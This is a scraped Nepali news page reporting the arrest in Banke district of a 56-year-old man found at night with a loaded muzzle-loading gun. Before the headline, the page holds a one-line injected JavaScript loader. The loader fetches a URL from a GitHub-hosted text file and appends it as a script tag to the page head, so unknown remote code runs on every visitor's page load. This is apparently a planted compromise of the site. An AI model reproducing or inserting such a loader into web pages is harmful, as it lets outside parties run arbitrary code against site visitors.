;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); भरुवा बन्दुकसहित बाँकेमा एक शिकारी पक्राउ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • भरुवा बन्दुकसहित बाँकेमा एक शिकारी पक्राउ
समाचार

भरुवा बन्दुकसहित बाँकेमा एक शिकारी पक्राउ

पक्राउ

भदौ १८,

बाँके । सशस्त्र प्रहरीले बाँकेबाट अवैध भरुवा बन्दुकसहित एक शिकारीलाई पक्राउ गरेको छ ।  सशस्त्र प्रहरी बल (बिओपी) कालाबन्जारबाट सशस्त्र प्रहरी निरिक्षक सन्तोष डाँगीको कमान्डमा खटिएको गस्ती टोलीले गएराती १ बजे डुडुवा गाउँपालिका वडा नं–६ शिखनपुर्वाका ५६ बर्षीय अजित सिंहलाई भरुवा बन्दुकसहित पक्राउ गरेको हो ।

पक्राउ गरिएको बन्दुक लोड रहेको पाइएको छ । बन्दुक बोकेर रातमा हिडिरहेका सिंहले गस्तीमा रहेको प्रहरी टोलीलाई देखेर भाग्नै लाग्दा उनलाई पक्राउ गरिएको थियो ।  पक्राउ परेका सिंह र भरुवा बन्दुकलाई आवश्यक कारवाहीका लागि ईलाका प्रहरी कार्यालय हिरमिनिया बुझाईएको सशस्त्र प्रहरी बल नम्बर ३० गण बागेश्वरी बाँकेले जानकारी दिएको छ । file Photo

फेसबुक प्रतिक्रियाहरु